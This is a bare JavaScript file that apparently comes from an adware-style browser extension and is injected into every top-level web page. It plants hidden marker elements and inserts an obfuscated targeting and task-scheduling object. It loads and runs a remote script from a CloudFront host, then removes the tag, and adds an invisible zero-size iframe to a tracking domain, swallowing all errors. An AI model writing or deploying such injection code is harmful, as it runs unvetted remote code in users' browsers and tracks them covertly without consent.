(function() {
	try {
		if (window == window.top) {
			(function() {
    var m=document.getElementById('dc7b6322-4109-e337-fa5a-3c8fe836a666-6fd1d38d-bf90-84d0-eecd-d60425afc82b-0');
    if (!m) {
		var heads = document.getElementsByTagName('head');
		if (heads && heads.length > 0) {
			m=document.createElement('meta');
			m.setAttribute('id','dc7b6322-4109-e337-fa5a-3c8fe836a666-6fd1d38d-bf90-84d0-eecd-d60425afc82b-0');
			heads[0].appendChild(m);
		} else {
			var bodies = document.getElementsByTagName('body');
			m=document.createElement('div');
			m.setAttribute('id','dc7b6322-4109-e337-fa5a-3c8fe836a666-6fd1d38d-bf90-84d0-eecd-d60425afc82b-0');
			m.setAttribute('style','display:none;');
			bodies[0].appendChild(m);
		}
        (function () {
     try {               
     	 //var txt = '(function(){'
         //  +'var e={register:function(e,t,n,r,i,s){if(!this.groups[e]){return false}var o={id:t,freq:n,max:r,maxReset:i,cb:s};this.groups[e].tasks[t]=o;return true},registerAntiTask:function(e,t){if(!this.antiTasks){return false}var n={id:e,cb:t};this.antiTasks.push(n);return true},registerAntiTask2:function(e,t,n,r,i,s){if(!this.antiTasks){return false}var o={id:e,anti:t,freq:n,max:r,maxReset:i,cb:s};this.antiTasks2.push(o);return true},createGroup:function(e,t,n,r){var i={id:e,freq:t,max:n,maxReset:r,tasks:{},validTasks:[]};this.groups[e]=i},groups:{},antiTasks:[],antiTasks2:[]};'
         //  +'e.createGroup("HPA",30,null,null);'
         //  +'window["0C9E1ED25-0A8F-4306-9DB9-3B874B485C3B-MB"]=e})();';
       
         var txt = '(function(){'
           +'var e={register:function(e,t,n,r,i,s){if(!this.groups[e]){return false}var o={id:t,freq:n,max:r,maxReset:i,cb:s};this.groups[e].tasks[t]=o;return true},registerAntiTask:function(e,t){if(!this.antiTasks){return false}var n={id:e,cb:t};this.antiTasks.push(n);return true},registerAntiTask2:function(e,t,n,r,i,s){if(!this.antiTasks){return false}var o={id:e,anti:t,freq:n,max:r,maxReset:i,cb:s};this.antiTasks2.push(o);return true},createGroup:function(e,t,n,r){var i={id:e,freq:t,max:n,maxReset:r,tasks:{},validTasks:[]};this.groups[e]=i},createRootGroup:function(e,t){var n=false;if(t==1){n=true}if(this.groot!=null){return false}var r={id:e,freq:null,max:null,maxReset:null,tasks:{},subGroups:{},isBatch:n};this.groups2[e]=r;this.groot=r},createSubGroup:function(e,t,n,r,i,s,o){if(!this.groups2[t]){return false}if(!o||o<0){o=0}var u=false;if(n==1){u=true}var a={id:e,freq:r,max:i,maxReset:s,tasks:{},subGroups:{},isBatch:u};if(!this.groups2[t].subGroups[o]){this.groups2[t].subGroups[o]={}}this.groups2[t].subGroups[o][e]=a;this.groups2[e]=a},registerTask:function(e,t,n){if(!n){return false}var r={id:e,cb:n};for(var i=0;i<t.length;i++){if(this.groups2[t[i]]&&this.groups2[t[i]].tasks){this.groups2[t[i]].tasks[e]=r}}return true},registerFallbackTask:function(e,t){if(!this.fallbackTasks){return false}var n={id:e,cb:t};this.fallbackTasks.push(n);return true},groups:{},antiTasks:[],antiTasks2:[],groot:null,groups2:{},fallbackTasks:[]};'

           +'e.createGroup("HPA",30,null,null);'
           +'e.createRootGroup("Root",0);'
           +'e.createSubGroup("HPA_Targeted","Root",0,null,null,null,1);'
           +'e.createSubGroup("Global","Root",0,null,null,null,0);'
           +'e.createSubGroup("ITS","HPA_Targeted",0,null,null,null,0);'
           +'e.createSubGroup("HPA2","Global",0,30,null,null,1);'
           +'e.createSubGroup("LPA","Global",0,null,null,null,0);'
           +'window["0C9E1ED25-0A8F-4306-9DB9-3B874B485C3B-MB"]=e})();'
       
       
         var h = document.getElementsByTagName("head")[0];
         var s = document.createElement("script");
         s.text = txt;
         h.appendChild(s);
     } catch (ex) {}
 })();
    }
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
    var m=document.getElementById('dc7b6322-4109-e337-fa5a-3c8fe836a666-e0633250-5e4d-0b62-332c-648bf84e7aa4-0');
    if (!m) {
		var heads = document.getElementsByTagName('head');
		if (heads && heads.length > 0) {
			m=document.createElement('meta');
			m.setAttribute('id','dc7b6322-4109-e337-fa5a-3c8fe836a666-e0633250-5e4d-0b62-332c-648bf84e7aa4-0');
			heads[0].appendChild(m);
		} else {
			var bodies = document.getElementsByTagName('body');
			m=document.createElement('div');
			m.setAttribute('id','dc7b6322-4109-e337-fa5a-3c8fe836a666-e0633250-5e4d-0b62-332c-648bf84e7aa4-0');
			m.setAttribute('style','display:none;');
			bodies[0].appendChild(m);
		}
        (function () {
          try {		    				    		    
            unsafeWindow["AD42F94D-5283-4CC0-A86A-059C19C7DA98-COMM"] = DynFF;
            if (window['DYN_9F3E3D59_F64E_4645_AEB8_6C52FCC29CA2']) {
            	window['735B9329-8A42-4EC1-B124-6EFB3F663C01-COMM2'] = window['DYN_9F3E3D59_F64E_4645_AEB8_6C52FCC29CA2'];
        	}
              
            var h = document.getElementsByTagName('head')[0];
            var s = document.createElement('script');
            s.text = 'window["08486F40-E398-4708-B4A2-93AED314C17F-CFG"] = { '
            	+ 'CdnUrlPrefix: "//d25s4dbsms5nvt.cloudfront.net" '
                + ',Dat: "https://d25k7p3x8sdssj.cloudfront.net" '
				+ '}; ';
			h.appendChild(s);
              
                
            s = document.createElement("script");
		    s.src = "//d1ui18tz1fx59z.cloudfront.net/js/mb/B.js";
            s.onload = s.onreadystatechange = function () {
              if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
                s.onload = s.onreadystatechange = null;
                h.removeChild(s);
              }
            };
            h.appendChild(s);
          } catch (ex) {}
		})();
    }
})();
		}
	} catch (e) {}
})();(function() {
	try {
		if (window == window.top) {
			(function() {
    var m=document.getElementById('dc7b6322-4109-e337-fa5a-3c8fe836a666-e0273150-5d4d-0b26-332f-208bf84d3ea4-0');
    if (!m) {
		var heads = document.getElementsByTagName('head');
		if (heads && heads.length > 0) {
			m=document.createElement('meta');
			m.setAttribute('id','dc7b6322-4109-e337-fa5a-3c8fe836a666-e0273150-5d4d-0b26-332f-208bf84d3ea4-0');
			heads[0].appendChild(m);
		} else {
			var bodies = document.getElementsByTagName('body');
			m=document.createElement('div');
			m.setAttribute('id','dc7b6322-4109-e337-fa5a-3c8fe836a666-e0273150-5d4d-0b26-332f-208bf84d3ea4-0');
			m.setAttribute('style','display:none;');
			bodies[0].appendChild(m);
		}
        try {
   			var iframe = document.createElement('iframe');
			iframe.setAttribute('name', '_rlcdn');
			iframe.setAttribute('width', '0');
			iframe.setAttribute('height', '0');
			iframe.setAttribute('frameborder', '0');
			iframe.setAttribute('src', document.location.protocol + '//rc.rlcdn.com/378618.html');
			document.body.appendChild(iframe);
		

   	}catch(ex1) {}
    }
})();
		}
	} catch (e) {}
})();